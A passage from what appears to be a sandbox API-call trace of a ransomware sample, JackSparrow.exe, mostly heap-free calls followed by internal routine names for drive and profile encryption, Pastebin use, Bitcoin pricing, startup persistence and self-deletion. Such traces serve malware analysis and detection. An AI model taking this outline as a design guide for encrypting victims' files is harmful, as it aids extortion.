lpMem=0x7a37a0 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37e8 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3788 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3770 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3710 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3758 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a36f8 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a36f8 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.036] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7963f0 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3308 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3770 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3788 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7963f0 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38a8 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a36f8 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3728 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3758 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3710 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37a0 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3770 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3788 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3800 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3818 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38c0 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3848 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3860 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3920 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3938 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4280 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4268 | out: hHeap=0x770000) returned 1 [0026.037] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a38a8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4298 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4298 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3358 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7963f0 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab70 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3358 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aac8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3358 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aac8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3378 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4298 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4268 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a4280 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab40 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab70 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aae0 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab28 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa50 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa68 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aac8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9d8 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9a8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3398 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3378 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7963f0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a3398 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9a8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796440 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796440 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a33a8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a630 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x796440 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aae0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a33b8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab88 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9a8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a978 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa98 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aa38 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79a9f0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79ab70 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aaf8 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x79aae0 | out: hHeap=0x770000) returned 1 [0026.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7a37b8 | out: hHeap=0x770000) returned 1 [0026.050] IUnknown:Release (This=0x796260) returned 0x0 [0026.050] FreeLibrary (hLibModule=0x1270000) returned 1 [0026.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", nBufferLength=0x7fff, lpBuffer=0x6af7b8, lpFilePart=0x6cf7d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\JackSparrow.exe", lpFilePart=0x6cf7d8*="JackSparrow.exe") returned 0x35 [0026.050] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0026.050] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0026.050] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0026.050] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0026.050] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0026.050] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0026.050] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0026.050] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0026.050] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0026.050] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0026.050] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0026.051] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0026.051] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0026.051] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0026.051] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0026.051] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0026.051] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0026.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0026.052] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0026.052] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0026.052] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0026.053] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0026.053] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0026.053] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0026.053] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0026.053] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0026.053] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0026.053] CharUpperBuffW (in: lpsz="_DECRYPT", cchLength=0x8 | out: lpsz="_DECRYPT") returned 0x8 [0026.053] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0026.053] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0026.053] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0026.053] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0026.053] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0026.053] CharUpperBuffW (in: lpsz="_RUNCMD", cchLength=0x7 | out: lpsz="_RUNCMD") returned 0x7 [0026.053] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0026.053] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.053] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.053] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0026.053] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0026.054] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0026.054] CharUpperBuffW (in: lpsz="_ASH_USERKEY_DETECT", cchLength=0x13 | out: lpsz="_ASH_USERKEY_DETECT") returned 0x13 [0026.054] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0026.054] CharUpperBuffW (in: lpsz="SUICIDE", cchLength=0x7 | out: lpsz="SUICIDE") returned 0x7 [0026.054] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0026.054] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0026.054] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0026.054] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0026.054] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0026.054] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0026.054] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0026.054] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0026.054] CharUpperBuffW (in: lpsz="_GUICTRLEDIT_SETLIMITTEXT", cchLength=0x19 | out: lpsz="_GUICTRLEDIT_SETLIMITTEXT") returned 0x19 [0026.054] CharUpperBuffW (in: 